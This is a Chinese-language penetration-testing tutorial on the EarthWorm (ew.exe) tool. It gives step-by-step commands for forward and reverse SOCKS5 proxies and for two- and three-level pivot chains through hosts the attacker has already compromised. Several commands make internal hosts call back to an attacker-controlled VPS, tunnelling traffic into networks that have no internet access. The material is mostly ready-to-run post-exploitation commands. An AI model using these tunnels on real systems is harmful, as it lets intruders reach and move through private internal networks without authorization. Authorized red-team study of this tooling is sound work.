正向socks v5服务器	【适用于目标机器拥有一个外网IP】
服务器端执行以下命令
ew.exe -s ssocksd -l 888

说明：服务器开启端口为888，SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。

-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

反弹socks v5服务器	【适用于目标机器没有公网IP，但可访问内网资源】

本地执行以下命令
ew.exe -s rcsocks -l 1008 -e 888

说明：该命令的意思是在我们公网VPS上添加一个转接隧道，把1080端口收到的代理请求转交给888端口。

服务器端执行以下命令
ew.exe -s rssocks -d 2.2.2.2 -e 888

说明：该命令的意思是在服务器上启动SOCKS V5服务，并反弹到IP地址为2.2.2.2的服务器888端口上。

-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

二级网络环境（一）

假设我们获得了右侧A主机和B主机的控制权
A主机配有2块网卡，一块连通外网，一块10.48.128.25只能连接内网B主机，无法访问内网其它资源。
B主机可以访问内网资源，但无法访问外网。

A.先上传ew到B主机，利用ssocksd方式启动888端口的SOCKS代理，命令如下：
ew -s ssocksd -l 888


B.上传ew到右侧A主机，运行下列命令：
ew -s lcx_tran -l 1080 -f 10.48.128.49 -g 888

说明：该命令意思是将1080端口收到的代理请求转交给B主机（10.48.128.49）的888端口。

C.可以通过访问A主机外网139.XXX.XX.113:1080来使用在B主机架设的socks5代理。

-------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------

二级网络环境（二）

假设我们获得了右侧A主机和B主机的控制权限。
A主机没有公网IP，也无法访问内网资源。B主机可以访问内网资源，但无法访问外网。

这个操作分为4步，用到lcx_listen和lcx_slave命令：

A. 先上传ew 到左侧公网VPS上，运行下列命令：
ew Cs lcx_listen Cl 10800 Ce 888
说明：该命令意思是在公网VPS添加转接隧道，将10800端口收到的代理请求转交给888端口。

B.上传ew到B主机，并利用ssocksd方式启动999端口的socks代理，命令如下：
ew -s ssocksd -l 999

C.上传ew 到A主机，运行下列命令：
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.49 -g 999
说明：该命令意思是在A主机上利用lcx_slave方式，将公网VPS的888端口和B主机的999端口连接起来。

D. 返回我们公网VPS的CMD界面下，可以看到已经连接成功了。
现在就可以通过访问公网VPS地址 139.XXX.XX.113:10800来使用在B主机架设的socks5代理。


三级网络环境

三级网络环境在实际渗透中用的比较少，也比较复杂，现在我们来一个个的讲解下三级级联的用法。

假设渗透场景：
内网A主机没有公网IP但可以访问外网
B主机不能访问外网但可以被A主机访问、C主机可被B主机访问而且能够访问核心区域。

A.在左侧公网VPS上运行命令，将1080端口收到的代理请求转交给888端口：
ew -s rcsocks -l 1080 -e 888

B.在A主机上运行命令，将公网VPS的888端口和B主机的999端口连接起来：
ew -s lcx_slave -d 139.XXX.XX.113 -e 888 -f 10.48.128.12 -g 999

C.在B主机上运行命令，将999端口收到的代理请求转交给777端口：
ew -s lcx_listen -l 999 -e 777

D.在C主机上启动SOCKS V5服务，并反弹到B主机的777端口上，命令如下。
ew -s rssocks -d 10.48.128.12 -e 777

E.在MY PC上可以通过访问公网VPS 139.XXX.XX.113:1080来使用在C主机架设的socks5代理。

整个数据流向是：SOCKS V5 → 1080 → 888 →999 →777 → rssocks
